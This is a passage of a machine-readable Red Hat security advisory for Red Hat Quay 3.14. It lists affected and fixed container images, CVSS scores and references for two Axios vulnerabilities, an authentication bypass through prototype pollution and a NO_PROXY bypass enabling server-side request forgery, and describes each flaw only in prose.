            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:e76507eecc44ee17c66566769ff427c561df85db700c2b16ead0ecd894f40b9f_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:052bf6483aa0e3cfae7cc28822bb05b7ebf1c2dd2019bae53874db19a7ced51f_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:0f209a6799f9eb6987d9479fc6631d3f6dabdf89faa0059c9c62010f4f46e2ba_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:eade47dd4e39ed346f9ea867a90e07fc70ff2ff4a6cce4a21ac77f88e9abad10_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:fac5b4a10d565051251ec328df69026458ede4dadc48b401dcb923979bf96b88_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:9e026e4b86da6a0719b0bf6973d465cd542ead1715afb516e5e37ae8d9057964_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-bundle@sha256:a620b5e2749ad150d7ee07bd240f29a69ad2593a522869bd334441e9fb346e0e_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:6753b3d04a0cbf3ae35f8141df96505f099a39645ae3e68ae0b417ac572be64e_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:85c3bbf75379da98fbffe5ea1c53893a11ce42939d68687f16a0b687a9ba4b33_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:9fc318dd2650e6f3b68084e2f155a5485395026cba186018f6a2d5e70284bb6a_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:db535f8a5dea4124ee8140a48362d0a631cc19158a3944f0059219a5c7b44e3e_amd64"
          ]
        }
      ],
      "ids": [
        {
          "system_name": "Red Hat Bugzilla ID",
          "text": "2461629"
        }
      ],
      "notes": [
        {
          "category": "description",
          "text": "A flaw was found in Axios, a promise-based HTTP client. This vulnerability, a Prototype Pollution \"Gadget\" attack, allows an attacker to manipulate the `Object.prototype.validateStatus` property. By polluting this property, all HTTP error responses (such as 401, 403, or 500) are silently treated as successful responses. This can lead to a complete bypass of application-level authentication and error handling, potentially granting unauthorized access.",
          "title": "Vulnerability description"
        },
        {
          "category": "summary",
          "text": "axios: Axios: Authentication bypass due to prototype pollution of HTTP error handling",
          "title": "Vulnerability summary"
        },
        {
          "category": "general",
          "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
          "title": "CVSS score applicability"
        }
      ],
      "product_status": {
        "fixed": [
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:4ae7d2d72a2370bd5401f570e21386bc9a6df0b145030060c922fcf754c7839b_s390x",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:9f5d146fc72a09d9067705a35274a251708cebc4c6a7e50615bdbce3e128c097_amd64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:a46c3fd8bb72616f07d2fb47eae9b060ea6c5135ec365d7ddc0dc18054da0b1b_arm64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:fca718bcd95971e571d13f9139e2f40c2daeca9605c669d73ed3055d9e3a53e2_ppc64le"
        ],
        "known_not_affected": [
          "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:4dcd3b60f93e03d7d59e7dedc2ffcaa835de53ce672a179527f26ffe295473d2_ppc64le",
          "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:7a0ec7eb2f7e1cd78834a108c84edb7f3a9f769209ba98b8bb0d1f7d66344e72_arm64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c36f983f25aad87857f89920f0878fb081f9c55d471e98fa25a3af0507da4b42_s390x",
          "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c82534a20a7a5e2ecd49ac6307df13ede380c8b3d7ca4c6978aed1efab9c6ae4_amd64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:36377e0f89e28bb05dd45c424ac336b2884e91267a118763ddd9a1e8d8f75295_amd64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:087c088a5f5da9a54608fd93bbc47654b7c24661dfcdf3b64d04d496924a5e4b_arm64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:0e7f72c6427b9c941a765470683c3cfe81644bd0337b88c5f3d9021978aa38de_ppc64le",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:496e288875b50bb6f5ff1f92cd95a8df52ee02e97178e4134fcc3fc0b829f3b1_s390x",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:bc8584dbad964920db04fb5fa27044cb0219f7d736da16abe5deec2fb3d7b1a8_amd64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1fa815f5c0f997f55ca2db83575360f084d0ead955e62adcb7b4f0b53b1a01c7_s390x",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:532d123f74a39a92346daf91d69f2eebc97d48d49cf89b21ec4114824cb23b2d_ppc64le",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:b83c36737a574a3454d1be87b9bb7a513eab7b5071c662fde05e791ec2596ee2_arm64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:e76507eecc44ee17c66566769ff427c561df85db700c2b16ead0ecd894f40b9f_amd64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:052bf6483aa0e3cfae7cc28822bb05b7ebf1c2dd2019bae53874db19a7ced51f_amd64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:0f209a6799f9eb6987d9479fc6631d3f6dabdf89faa0059c9c62010f4f46e2ba_ppc64le",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:eade47dd4e39ed346f9ea867a90e07fc70ff2ff4a6cce4a21ac77f88e9abad10_arm64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:fac5b4a10d565051251ec328df69026458ede4dadc48b401dcb923979bf96b88_s390x",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:9e026e4b86da6a0719b0bf6973d465cd542ead1715afb516e5e37ae8d9057964_amd64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-bundle@sha256:a620b5e2749ad150d7ee07bd240f29a69ad2593a522869bd334441e9fb346e0e_amd64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:6753b3d04a0cbf3ae35f8141df96505f099a39645ae3e68ae0b417ac572be64e_ppc64le",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:85c3bbf75379da98fbffe5ea1c53893a11ce42939d68687f16a0b687a9ba4b33_arm64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:9fc318dd2650e6f3b68084e2f155a5485395026cba186018f6a2d5e70284bb6a_s390x",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:db535f8a5dea4124ee8140a48362d0a631cc19158a3944f0059219a5c7b44e3e_amd64"
        ]
      },
      "references": [
        {
          "category": "self",
          "summary": "Canonical URL",
          "url": "https://access.redhat.com/security/cve/CVE-2026-42041"
        },
        {
          "category": "external",
          "summary": "RHBZ#2461629",
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2461629"
        },
        {
          "category": "external",
          "summary": "https://www.cve.org/CVERecord?id=CVE-2026-42041",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-42041"
        },
        {
          "category": "external",
          "summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-42041",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42041"
        },
        {
          "category": "external",
          "summary": "https://github.com/axios/axios/security/advisories/GHSA-w9j2-pvgh-6h63",
          "url": "https://github.com/axios/axios/security/advisories/GHSA-w9j2-pvgh-6h63"
        }
      ],
      "release_date": "2026-04-24T17:55:30.036000+00:00",
      "remediations": [
        {
          "category": "vendor_fix",
          "date": "2026-05-26T17:12:40+00:00",
          "details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11458",
          "product_ids": [
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:4ae7d2d72a2370bd5401f570e21386bc9a6df0b145030060c922fcf754c7839b_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:9f5d146fc72a09d9067705a35274a251708cebc4c6a7e50615bdbce3e128c097_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:a46c3fd8bb72616f07d2fb47eae9b060ea6c5135ec365d7ddc0dc18054da0b1b_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:fca718bcd95971e571d13f9139e2f40c2daeca9605c669d73ed3055d9e3a53e2_ppc64le"
          ],
          "restart_required": {
            "category": "none"
          },
          "url": "https://access.redhat.com/errata/RHSA-2026:21017"
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "NONE",
            "baseScore": 8.2,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "LOW",
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:N",
            "version": "3.1"
          },
          "products": [
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:4dcd3b60f93e03d7d59e7dedc2ffcaa835de53ce672a179527f26ffe295473d2_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:7a0ec7eb2f7e1cd78834a108c84edb7f3a9f769209ba98b8bb0d1f7d66344e72_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c36f983f25aad87857f89920f0878fb081f9c55d471e98fa25a3af0507da4b42_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c82534a20a7a5e2ecd49ac6307df13ede380c8b3d7ca4c6978aed1efab9c6ae4_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:36377e0f89e28bb05dd45c424ac336b2884e91267a118763ddd9a1e8d8f75295_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:087c088a5f5da9a54608fd93bbc47654b7c24661dfcdf3b64d04d496924a5e4b_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:0e7f72c6427b9c941a765470683c3cfe81644bd0337b88c5f3d9021978aa38de_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:496e288875b50bb6f5ff1f92cd95a8df52ee02e97178e4134fcc3fc0b829f3b1_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:bc8584dbad964920db04fb5fa27044cb0219f7d736da16abe5deec2fb3d7b1a8_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1fa815f5c0f997f55ca2db83575360f084d0ead955e62adcb7b4f0b53b1a01c7_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:532d123f74a39a92346daf91d69f2eebc97d48d49cf89b21ec4114824cb23b2d_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:b83c36737a574a3454d1be87b9bb7a513eab7b5071c662fde05e791ec2596ee2_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:e76507eecc44ee17c66566769ff427c561df85db700c2b16ead0ecd894f40b9f_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:052bf6483aa0e3cfae7cc28822bb05b7ebf1c2dd2019bae53874db19a7ced51f_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:0f209a6799f9eb6987d9479fc6631d3f6dabdf89faa0059c9c62010f4f46e2ba_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:eade47dd4e39ed346f9ea867a90e07fc70ff2ff4a6cce4a21ac77f88e9abad10_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:fac5b4a10d565051251ec328df69026458ede4dadc48b401dcb923979bf96b88_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:9e026e4b86da6a0719b0bf6973d465cd542ead1715afb516e5e37ae8d9057964_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-bundle@sha256:a620b5e2749ad150d7ee07bd240f29a69ad2593a522869bd334441e9fb346e0e_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:6753b3d04a0cbf3ae35f8141df96505f099a39645ae3e68ae0b417ac572be64e_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:85c3bbf75379da98fbffe5ea1c53893a11ce42939d68687f16a0b687a9ba4b33_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:9fc318dd2650e6f3b68084e2f155a5485395026cba186018f6a2d5e70284bb6a_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:db535f8a5dea4124ee8140a48362d0a631cc19158a3944f0059219a5c7b44e3e_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:4ae7d2d72a2370bd5401f570e21386bc9a6df0b145030060c922fcf754c7839b_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:9f5d146fc72a09d9067705a35274a251708cebc4c6a7e50615bdbce3e128c097_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:a46c3fd8bb72616f07d2fb47eae9b060ea6c5135ec365d7ddc0dc18054da0b1b_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:fca718bcd95971e571d13f9139e2f40c2daeca9605c669d73ed3055d9e3a53e2_ppc64le"
          ]
        }
      ],
      "threats": [
        {
          "category": "impact",
          "details": "Important"
        }
      ],
      "title": "axios: Axios: Authentication bypass due to prototype pollution of HTTP error handling"
    },
    {
      "cve": "CVE-2026-42043",
      "cwe": {
        "id": "CWE-918",
        "name": "Server-Side Request Forgery (SSRF)"
      },
      "discovery_date": "2026-04-24T19:01:22.552379+00:00",
      "flags": [
        {
          "label": "vulnerable_code_not_present",
          "product_ids": [
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:4dcd3b60f93e03d7d59e7dedc2ffcaa835de53ce672a179527f26ffe295473d2_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:7a0ec7eb2f7e1cd78834a108c84edb7f3a9f769209ba98b8bb0d1f7d66344e72_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c36f983f25aad87857f89920f0878fb081f9c55d471e98fa25a3af0507da4b42_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c82534a20a7a5e2ecd49ac6307df13ede380c8b3d7ca4c6978aed1efab9c6ae4_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:36377e0f89e28bb05dd45c424ac336b2884e91267a118763ddd9a1e8d8f75295_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:087c088a5f5da9a54608fd93bbc47654b7c24661dfcdf3b64d04d496924a5e4b_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:0e7f72c6427b9c941a765470683c3cfe81644bd0337b88c5f3d9021978aa38de_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:496e288875b50bb6f5ff1f92cd95a8df52ee02e97178e4134fcc3fc0b829f3b1_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:bc8584dbad964920db04fb5fa27044cb0219f7d736da16abe5deec2fb3d7b1a8_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1fa815f5c0f997f55ca2db83575360f084d0ead955e62adcb7b4f0b53b1a01c7_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:532d123f74a39a92346daf91d69f2eebc97d48d49cf89b21ec4114824cb23b2d_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:b83c36737a574a3454d1be87b9bb7a513eab7b5071c662fde05e791ec2596ee2_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:e76507eecc44ee17c66566769ff427c561df85db700c2b16ead0ecd894f40b9f_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:052bf6483aa0e3cfae7cc28822bb05b7ebf1c2dd2019bae53874db19a7ced51f_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:0f209a6799f9eb6987d9479fc6631d3f6dabdf89faa0059c9c62010f4f46e2ba_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:eade47dd4e39ed346f9ea867a90e07fc70ff2ff4a6cce4a21ac77f88e9abad10_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:fac5b4a10d565051251ec328df69026458ede4dadc48b401dcb923979bf96b88_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:9e026e4b86da6a0719b0bf6973d465cd542ead1715afb516e5e37ae8d9057964_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-bundle@sha256:a620b5e2749ad150d7ee07bd240f29a69ad2593a522869bd334441e9fb346e0e_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:6753b3d04a0cbf3ae35f8141df96505f099a39645ae3e68ae0b417ac572be64e_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:85c3bbf75379da98fbffe5ea1c53893a11ce42939d68687f16a0b687a9ba4b33_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:9fc318dd2650e6f3b68084e2f155a5485395026cba186018f6a2d5e70284bb6a_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:db535f8a5dea4124ee8140a48362d0a631cc19158a3944f0059219a5c7b44e3e_amd64"
          ]
        }
      ],
      "ids": [
        {
          "system_name": "Red Hat Bugzilla ID",
          "text": "2461626"
        }
      ],
      "notes": [
        {
          "category": "description",
          "text": "A flaw was found in Axios, a promise-based HTTP client. An attacker who can control the destination address of an Axios request can exploit this vulnerability. By using specific internal network addresses (within the 127.0.0.0/8 range, excluding 127.0.0.1), the attacker can completely bypass the NO_PROXY protection, potentially leading to unauthorized access or information disclosure within the network. This issue is an incomplete fix for a previous vulnerability.",
          "title": "Vulnerability description"
        },
        {
          "category": "summary",
          "text": "axios: Axios: NO_PROXY bypass via crafted URL",
          "title": "Vulnerability summary"
        },
        {
          "category": "general",
          "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
          "title": "CVSS score applicability"
        }
      ],
      "product_status": {
        "fixed": [
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:4ae7d2d72a2370bd5401f570e21386bc9a6df0b145030060c922fcf754c7839b_s390x",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:9f5d146fc72a09d9067705a35274a251708cebc4c6a7e50615bdbce3e128c097_amd64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:a46c3fd8bb72616f07d2fb47eae9b060ea6c5135ec365d7ddc0dc18054da0b1b_arm64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:fca718bcd95971e571d13f9139e2f40c2daeca9605c669d73ed3055d9e3a53e2_ppc64le"
        ],
        "known_not_affected": [
          "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:4dcd3b60f93e03d7d59e7dedc2ffcaa835de53ce672a179527f26ffe295473d2_ppc64le",
          "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:7a0ec7eb2f7e1cd78834a108c84edb7f3a9f769209ba98b8bb0d1f7d66344e72_arm64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c36f983f25aad87857f89920f0878fb081f9c55d471e98fa25a3af0507da4b42_s390x",
          "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c82534a20a7a5e2ecd49ac6307df13ede380c8b3d7ca4c6978aed1efab9c6ae4_amd64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:36377e0f89e28bb05dd45c424ac336b2884e91267a118763ddd9a1e8d8f75295_amd64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:087c088a5f5da9a54608fd93bbc47654b7c24661dfcdf3b64d04d496924a5e4b_arm64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:0e7f72c6427b9c941a765470683c3cfe81644bd0337b88c5f3d9021978aa38de_ppc64le",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:496e288875b50bb6f5ff1f92cd95a8df52ee02e97178e4134fcc3fc0b829f3b1_s390x",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:bc8584dbad964920db04fb5fa27044cb0219f7d736da16abe5deec2fb3d7b1a8_amd64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1fa815f5c0f997f55ca2db83575360f084d0ead955e62adcb7b4f0b53b1a01c7_s390x",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:532d123f74a39a92346daf91d69f2eebc97d48d49cf89b21ec4114824cb23b2d_ppc64le",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:b83c36737a574a3454d1be87b9bb7a513eab7b5071c662fde05e791ec2596ee2_arm64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:e76507eecc44ee17c66566769ff427c561df85db700c2b16ead0ecd894f40b9f_amd64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:052bf6483aa0e3cfae7cc28822bb05b7ebf1c2dd2019bae53874db19a7ced51f_amd64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:0f209a6799f9eb6987d9479fc6631d3f6dabdf89faa0059c9c62010f4f46e2ba_ppc64le",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:eade47dd4e39ed346f9ea867a90e07fc70ff2ff4a6cce4a21ac77f88e9abad10_arm64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:fac5b4a10d565051251ec328df69026458ede4dadc48b401dcb923979bf96b88_s390x",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:9e026e4b86da6a0719b0bf6973d465cd542ead1715afb516e5e37ae8d9057964_amd64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-bundle@sha256:a620b5e2749ad150d7ee07bd240f29a69ad2593a522869bd334441e9fb346e0e_amd64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:6753b3d04a0cbf3ae35f8141df96505f099a39645ae3e68ae0b417ac572be64e_ppc64le",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:85c3bbf75379da98fbffe5ea1c53893a11ce42939d68687f16a0b687a9ba4b33_arm64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:9fc318dd2650e6f3b68084e2f155a5485395026cba186018f6a2d5e70284bb6a_s390x",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:db535f8a5dea4124ee8140a48362d0a631cc19158a3944f0059219a5c7b44e3e_amd64"
        ]
      },
      "references": [
        {
          "category": "self",
          "summary": "Canonical URL",
          "url": "https://access.redhat.com/security/cve/CVE-2026-42043"
        },
        {
          "category": "external",
          "summary": "RHBZ#2461626",
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2461626"
        },
        {
          "category": "external",
          "summary": "https://www.cve.org/CVERecord?id=CVE-2026-42043",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-42043"
        },
        {
          "category": "external",
          "summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-42043",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42043"
        },
        {
          "category": "external",
          "summary": "https://github.com/axios/axios/security/advisories/GHSA-pmwg-cvhr-8vh7",
          "url": "https://github.com/axios/axios/security/advisories/GHSA-pmwg-cvhr-8vh7"
        }
      ],
      "release_date": "2026-04-24T17:54:42.668000+00:00",
      "remediations": [
        {
          "category": "vendor_fix",
          "date": "2026-05-26T17:12:40+00:00",
          "details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11458",
          "product_ids": [
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:4ae7d2d72a2370bd5401f570e21386bc9a6df0b145030060c922fcf754c7839b_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:9f5d146fc72a09d9067705a35274a251708cebc4c6a7e50615bdbce3e128c097_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:a46c3fd8bb72616f07d2fb47eae9b060ea6c5135ec365d7ddc0dc18054da0b1b_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:fca718bcd95971e571d13f9139e2f40c2daeca9605c669d73ed3055d9e3a53e2_ppc64le"
          ],
          "restart_required": {
            "category": "none"
          },
          "url": "https://access.redhat.com/errata/RHSA-2026:21017"
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "NONE",
            "baseScore": 7.2,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "privilegesRequired": "NONE",
            "scope": "CHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N",
            "version": "3.1"
          },
          "products": [
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:4dcd3b60f93e03d7d59e7dedc2ffcaa835de53ce672a179527f26ffe295473d2_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:7a0ec7eb2f7e1cd78834a108c84edb7f3a9f769209ba98b8bb0d1f7d66344e72_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c36f983f25aad87857f89920f0878fb081f9c55d471e98fa25a3af0507da4b42_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c82534a20a7a5e2ecd49ac6307df13ede380c8b3d7ca4c6978aed1efab9c6ae4_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:36377e0f89e28bb05dd45c424ac336b2884e91267a118763ddd9a1e8d8f75295_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:087c088a5f5da9a54608fd93bbc47654b7c24661dfcdf3b64d04d496924a5e4b_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:0e7f72c6427b9c941a765470683c3cfe81644bd0337b88c5f3d9021978aa38de_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:496e288875b50bb6f5ff1f92cd95a8df52ee02e97178e4134fcc3fc0b829f3b1_s390x",
